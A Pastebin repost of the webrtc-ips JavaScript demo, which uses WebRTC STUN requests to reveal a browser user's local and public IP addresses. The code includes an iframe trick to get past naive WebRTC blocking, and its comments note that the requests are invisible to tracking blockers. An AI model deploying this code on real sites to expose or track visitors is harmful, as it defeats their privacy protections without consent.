Advertisement
BaSs_HaXoR

webrtc-ips Vulnerability (test) .js

Dec 15th, 2016
764
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
  3. #                       STUN IP Address requests for WebRTC                    #
  4. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
  5. #                   Demo: https://diafygi.github.io/webrtc-ips/                #
  6. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
  7. #                  Source: https://github.com/diafygi/webrtc-ips               #
  8. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
  9.  
  10. # ~~~~~~~~~~~~~~~~~~~~~~ #
  11.       What this does
  12. # ~~~~~~~~~~~~~~~~~~~~~~ #
  13.  
  14. Firefox and Chrome have implemented WebRTC that allow requests to STUN servers be made that will return the local and public IP addresses for the user. These request results are available to javascript, so you can now obtain a users local and public IP addresses in javascript. This demo is an example implementation of that.
  15.  
  16. Additionally, these STUN requests are made outside of the normal XMLHttpRequest procedure, so they are not visible in the developer console or able to be blocked by plugins such as AdBlockPlus or Ghostery. This makes these types of requests available for online tracking if an advertiser sets up a STUN server with a wildcard domain.
  17.  
  18. # ~~~~~~~~~~~~~~~~~~~~~~ #
  19. #          Code          #
  20. # ~~~~~~~~~~~~~~~~~~~~~~ #
  21.  
  22. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
  23. Here (below) is the annotated demo function that makes the STUN request. You can copy and paste this into the Firefox or Chrome developer console to run the test.
  24. # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
  25. */
  26.  
  27. //get the IP addresses associated with an account
  28. function getIPs(callback){
  29.     var ip_dups = {};
  30.  
  31.     //compatibility for firefox and chrome
  32.     var RTCPeerConnection = window.RTCPeerConnection
  33.         || window.mozRTCPeerConnection
  34.         || window.webkitRTCPeerConnection;
  35.     var useWebKit = !!window.webkitRTCPeerConnection;
  36.  
  37.     //bypass naive webrtc blocking using an iframe
  38.     if(!RTCPeerConnection){
  39.         //NOTE: you need to have an iframe in the page right above the script tag
  40.         //
  41.         //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
  42.         //<script>...getIPs called in here...
  43.         //
  44.         var win = iframe.contentWindow;
  45.         RTCPeerConnection = win.RTCPeerConnection
  46.             || win.mozRTCPeerConnection
  47.             || win.webkitRTCPeerConnection;
  48.         useWebKit = !!win.webkitRTCPeerConnection;
  49.     }
  50.  
  51.     //minimal requirements for data connection
  52.     var mediaConstraints = {
  53.         optional: [{RtpDataChannels: true}]
  54.     };
  55.  
  56.     var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
  57.  
  58.     //construct a new RTCPeerConnection
  59.     var pc = new RTCPeerConnection(servers, mediaConstraints);
  60.  
  61.     function handleCandidate(candidate){
  62.         //match just the IP address
  63.         var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
  64.         var ip_addr = ip_regex.exec(candidate)[1];
  65.  
  66.         //remove duplicates
  67.         if(ip_dups[ip_addr] === undefined)
  68.             callback(ip_addr);
  69.  
  70.         ip_dups[ip_addr] = true;
  71.     }
  72.  
  73.     //listen for candidate events
  74.     pc.onicecandidate = function(ice){
  75.  
  76.         //skip non-candidate events
  77.         if(ice.candidate)
  78.             handleCandidate(ice.candidate.candidate);
  79.     };
  80.  
  81.     //create a bogus data channel
  82.     pc.createDataChannel("");
  83.  
  84.     //create an offer sdp
  85.     pc.createOffer(function(result){
  86.  
  87.         //trigger the stun server request
  88.         pc.setLocalDescription(result, function(){}, function(){});
  89.  
  90.     }, function(){});
  91.  
  92.     //wait for a while to let everything done
  93.     setTimeout(function(){
  94.         //read candidate info from local description
  95.         var lines = pc.localDescription.sdp.split('\n');
  96.  
  97.         lines.forEach(function(line){
  98.             if(line.indexOf('a=candidate:') === 0)
  99.                 handleCandidate(line);
  100.         });
  101.     }, 1000);
  102. }
  103.  
  104. //Test: Print the IP addresses into the console
  105. getIPs(function(ip){console.log(ip);});
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement